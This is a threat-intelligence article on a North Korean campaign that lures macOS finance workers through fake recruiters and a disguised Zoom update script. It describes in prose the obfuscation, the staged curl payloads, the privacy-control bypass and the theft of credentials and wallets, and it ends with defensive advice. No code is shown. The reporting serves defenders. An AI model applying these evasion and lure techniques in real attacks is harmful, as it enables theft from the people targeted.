North Korea Launches macOS-Targeted Espionage Campaign

Key Takeaways

• North Korean threat group Sapphire Sleet (a Lazarus off‑shoot tracked as APT38) uses social engineering on LinkedIn to lure finance professionals with fake job offers and technical interviews.
• The attack chain begins with a malicious AppleScript file named Zoom SDK Update.scpt that masquerades as a legitimate Zoom software update for macOS.
• The script employs obfuscation techniques—thousands of blank lines, a harmless‑looking softwareupdate call, and dynamic curl‑fetched payloads—to bypass user suspicion and security controls.
• Subsequent stages harvest credentials, steal cryptocurrency wallets, browser data, keychains, Apple Notes, and Telegram login details while abusing native Apple tools and mimicking Apple‑style naming (e.g., com.apple.cli, systemupdate.app, icloudz).
• Apple has responded with platform‑level protections, including Safari Safe Browsing blocks and XProtect signatures, but user education remains critical: never run unsolicited scripts or commands without IT approval.

Background of Sapphire Sleet
Microsoft’s threat intelligence team tracks a North Korean‑backed cybercrime unit known as Sapphire Sleet, also designated APT38, as an off‑shoot of the infamous Lazarus Group. Active since at least 2020, the crew concentrates on the financial sector, aiming to exfiltrate cryptocurrency wallets, blockchain‑related intellectual property, and any data that can be monetized or used to fund the regime’s illicit activities. Their focus on finance professionals makes them adept at crafting convincing lures that appear as legitimate career opportunities.

Initial Social‑Engineering Tactics
The campaign starts with the creation of bogus recruiter profiles on professional networking sites such as LinkedIn. Posing as headhunters for prestigious fintech firms, the attackers contact targets with enticing job offers and subsequently schedule a technical interview. This interview serves as the delivery mechanism for the malware; the victim is coached to expect a software‑related task, lowering their guard when asked to download a file or run a command during the “interview” process.

The Fake Zoom SDK Update Lure
During the arranged interview, Sapphire Sleet sends the victim a meeting invitation that purports to be from Zoom support. Attached—or linked—is a file named Zoom SDK Update.scpt. When opened on macOS, the file launches automatically in the native Script Editor application, presenting itself as a legitimate software update script. The initial view shows a large comment block filled with plausible update instructions, deliberately designed to reassure the user that nothing out of the ordinary is occurring.

Obfuscation Through Blank Lines and Harmless Calls
Beneath the benign‑looking header, the script contains thousands of blank lines that push the malicious logic far below the visible area of the Script Editor window, making it unlikely that a casual glance will reveal the harmful code. The first executable instruction invokes the legitimate macOS softwareupdate binary with an invalid parameter. This call does nothing useful but launches a trusted, Apple‑signed process, reinforcing the impression that a genuine system update is underway.

Dynamic Multi‑Stage Payload Delivery
After the innocuous softwareupdate call, the script executes a curl command that fetches a second AppleScript from an attacker‑controlled server. This second script runs within the same Script Editor context and, in turn, pulls down additional payloads via successive curl requests. Each stage uses a distinct User‑Agent string, allowing the attackers to track which victim is at which point in the infection chain while keeping the traffic blended with normal web requests.

Purpose‑Built Malware Modules
The successive payloads serve specialized functions:

• Orchestration and backdooring establish a persistent foothold on the compromised machine.
• Reconnaissance modules gather system information, installed applications, and network details.
• C2 registration registers the infected host with Sapphire Sleet’s command‑and‑control infrastructure.
• TCC bypass abuse leverages native macOS APIs to circumvent Transparency, Consent, and Control protections that guard privacy‑sensitive data.
• Credential and data harvesting extracts wallets, browser histories, keychains, Apple Notes, Telegram login details, and other valuable information, which is then exfiltrated via the Telegram Bot API.

Disguising Malicious Activity with Apple‑Style Naming
To evade detection, the attackers meticulously mimic legitimate Apple components. A host‑monitoring binary is named com.apple.cli, giving it the appearance of a core macOS utility. The credential‑stealer drops a malicious application called systemupdate.app that, when launched, displays a password dialog virtually identical to the authentic macOS “software update” prompt, coaxing users into entering their administrator credentials. Another backdoor, dubbed icloudz, masquerades as an iCloud‑related artifact and uses the NSCreateObjectFileImageFromMemory API to load additional code directly into memory, further reducing its footprint on disk.

Apple’s Response and Mitigations
Microsoft disclosed the campaign to Apple, prompting the latter to deploy platform‑level defenses. Safari now includes Safe Browsing protections that detect and block the malicious infrastructure associated with Sapphire Sleet, while macOS receives automatic XProtect signature updates capable of identifying and quarantining the malware families used in the attack. These updates are silent to end users, requiring no manual intervention. Nevertheless, technical controls alone cannot stop social engineering; human vigilance remains essential.

Recommendations for Organizations and Individuals
To defend against similar attacks, organizations should:

• Conduct regular security awareness training that emphasizes the dangers of unsolicited LinkedIn messages, job offers, and requests to download software or join virtual meetings.
• Enforce strict policies prohibiting the execution of scripts or code received via email, messaging platforms, or chat without prior approval from IT or security teams.
• Implement endpoint detection and response (EDR) solutions capable of flagging abnormal curl or osascript behavior, even when signed Apple binaries are involved.
• Ensure macOS devices are kept up to date so that Apple‑provided protections (Safe Browsing, XProtect) are always active.
• Adopt the principle of least privilege, limiting users’ ability to install unsigned applications or alter system settings without administrative approval.

By combining technical safeguards with informed user behavior, enterprises can markedly reduce the risk posed by Sapphire Sleet’s sophisticated blend of social engineering and macOS‑specific malware.

Staying vigilant against seemingly routine requests—especially those that arrive under the guise of career opportunities or software updates—is the most effective line of defense against North Korean‑linked threat actors seeking to steal credentials and cryptocurrency.